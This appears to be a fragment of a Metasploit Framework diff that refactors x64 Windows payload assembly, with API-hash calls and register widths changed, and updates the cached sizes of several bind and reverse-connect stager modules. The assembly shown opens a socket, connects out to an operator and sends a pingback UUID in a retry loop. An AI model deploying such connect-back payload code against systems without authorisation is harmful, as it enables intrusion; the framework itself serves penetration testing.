Msf::Payload::Single @@ -168,14 +168,14 @@ def generate(_opts = {}) ; perform the call to LoadLibraryA... mov rcx, r14 ; set the param for the library to load - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA( "ws2_32" ) ; perform the call to WSAStartup... mov rdx, r13 ; second param is a pointer to this struct push 0x0101 ; pop rcx ; set the param for the version requested - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')} call rbp ; WSAStartup( 0x0101, &WSAData ); ; stick the retry count on the stack and store it @@ -194,7 +194,7 @@ def generate(_opts = {}) mov rdx, rax ; push SOCK_STREAM inc rax ; mov rcx, rax ; push AF_INET - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')} call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); mov rdi, rax ; save the socket for later @@ -204,7 +204,7 @@ def generate(_opts = {}) pop r8 ; pop off the third param mov rdx, r12 ; set second param to pointer to sockaddr struct mov rcx, rdi ; the socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + mov r10d, #{block_api_hash('ws2_32.dll', 'connect')} call rbp ; connect( s, &sockaddr, 16 ); test eax, eax ; non-zero means failure @@ -233,12 +233,12 @@ def generate(_opts = {}) get_pingback_address: pop rdx ; PINGBACK UUID address mov rcx, rdi ; Socket handle - mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + mov r10d, #{block_api_hash('ws2_32.dll', 'send')} call rbp ; call send close_socket: mov rcx, rdi ; Socket handle - mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')} call rbp ; call closesocket ^ if pingback_count > 0 @@ -249,7 +249,7 @@ def generate(_opts = {}) dec r15 ;decrement the pingback retry counter push #{pingback_sleep * 1000} ; 10 seconds pop rcx ; set the sleep function parameter - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')} call rbp ; Sleep() jmp create_socket ; repeat callback ^ diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb index 1a0f5e2c4ee0f..bdb0f216bccd8 100644 --- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb @@ -4,7 +4,7 @@ ## module MetasploitModule - CachedSize = 526 + CachedSize = 525 include Msf::Payload::Stager include Msf::Payload::Windows::BindTcp_x64 diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb index 592a07ad9b3ef..272d6329d7c0c 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb @@ -4,7 +4,7 @@ ## module MetasploitModule - CachedSize = 524 + CachedSize = 523 include Msf::Payload::Stager include Msf::Payload::Windows::BindTcp_x64 diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index cfa5742fbe765..91e3ed1cd2538 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -4,8 +4,8 @@ ## module MetasploitModule - CachedSize = 607 - CachedSizeOverrides = {"windows/x64/custom/reverse_http" => 628} + CachedSize = 586 + CachedSizeOverrides = {"windows/x64/custom/reverse_http" => 606} include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index 709c805df1441..8736bf07eab78 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -4,8 +4,8 @@ ## module MetasploitModule - CachedSize = 638 - CachedSizeOverrides = {"windows/x64/custom/reverse_https" => 659} + CachedSize = 616 + CachedSizeOverrides = {"windows/x64/custom/reverse_https" => 636} include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb index c92387d58c20a..3a672cbed90e2 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb @@ -4,7 +4,7 @@ ## module MetasploitModule - CachedSize = 491 + CachedSize = 490 include Msf::Payload::Stager include Msf::Payload::Windows::ReverseTcp_x64 diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb index f4789b0e1035e..45987b8070c64 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb @@ -4,8 +4,8 @@ ## module MetasploitModule - CachedSize = 751 - CachedSizeOverrides = {"windows/x64/custom/reverse_winhttp" => 771} + CachedSize = 718 + CachedSizeOverrides = {"windows/x64/custom/reverse_winhttp" => 734} include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb index 8329bb24e6aef..098efe2e8236c 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb @@ -4,8 +4,8 @@ ## module MetasploitModule - CachedSize = 787 - CachedSizeOverrides = {"windows/x64/custom/reverse_winhttps" => 807} + CachedSize = 750 + CachedSizeOverrides = {"windows/x64/custom/reverse_winhttps" => 766} include Msf::Payload::Stager include Msf::Payload::Windows